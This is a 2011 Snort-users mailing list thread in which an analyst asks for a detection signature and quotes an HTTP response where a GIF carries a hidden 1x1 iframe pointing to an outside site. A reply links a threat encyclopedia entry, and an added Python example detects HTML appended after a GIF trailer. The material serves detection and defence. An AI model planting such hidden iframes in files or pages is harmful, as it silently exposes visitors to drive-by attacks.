[Snort-users] iFrame's in gifs

rmkml rmkml at ...1855...
Fri Jun 24 18:24:01 EDT 2011


Hi James,
Maybe: http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?name=Trojan:Win32/Jpgiframe.A
Regards
Rmkml


On Fri, 24 Jun 2011, Lay, James wrote:

> Hey all!
>
> Anyone got any leads on this or a sig for this?  Excitement below. I
> have a full pcap as well as the original image if anyone wants them.
>
> James
>
> Sanitized headers
>
> GET /img/ HTTP/1.1
> Cookie: <snip>
> Host: magazine.gem-fashion.com
> Accept: */*
> Referer: http://magazine.gem-fashion.com/wearing-jewelry.html
> Accept-Language: en-us
> UA-CPU: x86
> Connection: Keep-Alive
>
> HTTP/1.1 404 Object Not Found
> Date: Fri, 24 Jun 2011 21:15:39 GMT
> Server: Apache
> X-Powered-By: PHP/5.2.11
> Expires: Thu, 19 Nov 1981 08:52:00 GMT
> Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
> pre-check=0
> Pragma: no-cache
> Set-Cookie: <snip>; path=/
> Content-Length: 1221
> Keep-Alive: timeout=5, max=99
> Connection: Keep-Alive
> Content-Type: image/gif
>
>
>
> GIF87a.............DBD...$"$...dbd.........TRT...424...trt....
> ..|..e:..`............*3.1..X.!.PA.;.m..H....;<iframe
> src='http://alaqiq.net/quran/gstata/index.php' width='1' height='1'
> style='visibility: hidden;'></iframe>
>
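A check along the lines James is asking for, written as an added example rather than code from the thread or from Snort: it walks the GIF block structure to find the real 0x3B trailer and reports any HTML tag in the bytes that follow it, which is exactly where the quoted response carries its `<iframe>`. The minimal GIF bytes and the URL in the sample are constructed, not taken from the original capture.

```python
import re

# Added example (not from the thread): detect HTML appended after a GIF's
# trailer, the layout seen in the quoted response ("...;<iframe src=...").
GIF_MAGIC = (b"GIF87a", b"GIF89a")
HTML_TAG_RE = re.compile(rb"<\s*(iframe|script|object|embed)\b", re.IGNORECASE)


def gif_end_offset(body: bytes):
    """Return the offset just past the 0x3B trailer, or None if the data is
    not a well-formed GIF. A plain search for b';' is not enough, since 0x3B
    can legitimately occur inside color tables or compressed image data."""
    if len(body) < 13 or not body.startswith(GIF_MAGIC):
        return None

    def skip_subblocks(p):  # length-prefixed sub-blocks ended by a 0 byte
        while p < len(body):
            n = body[p]
            p += 1
            if n == 0:
                return p
            p += n
        return None

    packed = body[10]  # logical screen descriptor flags
    pos = 13 + (3 * (2 << (packed & 0x07)) if packed & 0x80 else 0)  # global color table
    while pos is not None and pos < len(body):
        block = body[pos]
        pos += 1
        if block == 0x3B:  # trailer: the image ends here
            return pos
        if block == 0x21:  # extension: label byte, then sub-blocks
            pos = skip_subblocks(pos + 1)
        elif block == 0x2C and pos + 9 <= len(body):  # image descriptor
            ipacked = body[pos + 8]
            pos += 9 + (3 * (2 << (ipacked & 0x07)) if ipacked & 0x80 else 0)
            pos = skip_subblocks(pos + 1)  # LZW min code size byte, then data sub-blocks
        else:
            return None
    return None


def trailing_html_tag(body: bytes):
    """Lowercase name of the first HTML tag after the GIF trailer, else None."""
    end = gif_end_offset(body)
    if end is None:
        return None
    m = HTML_TAG_RE.search(body[end:])
    return m.group(1).decode().lower() if m else None


# Constructed sample: a minimal 1x1 GIF89a, then an iframe appended after the trailer.
CLEAN_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00"
             b"\x21\xf9\x04\x01\x00\x00\x00\x00"
             b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b")
INJECTED_GIF = CLEAN_GIF + b"<iframe src='http://example.invalid/index.php' width='1' height='1'></iframe>"
```

Run it over the body of any `image/gif` response (or over the extracted file): a result other than None means bytes after the image's trailer contain markup a browser could render when the file is served inline.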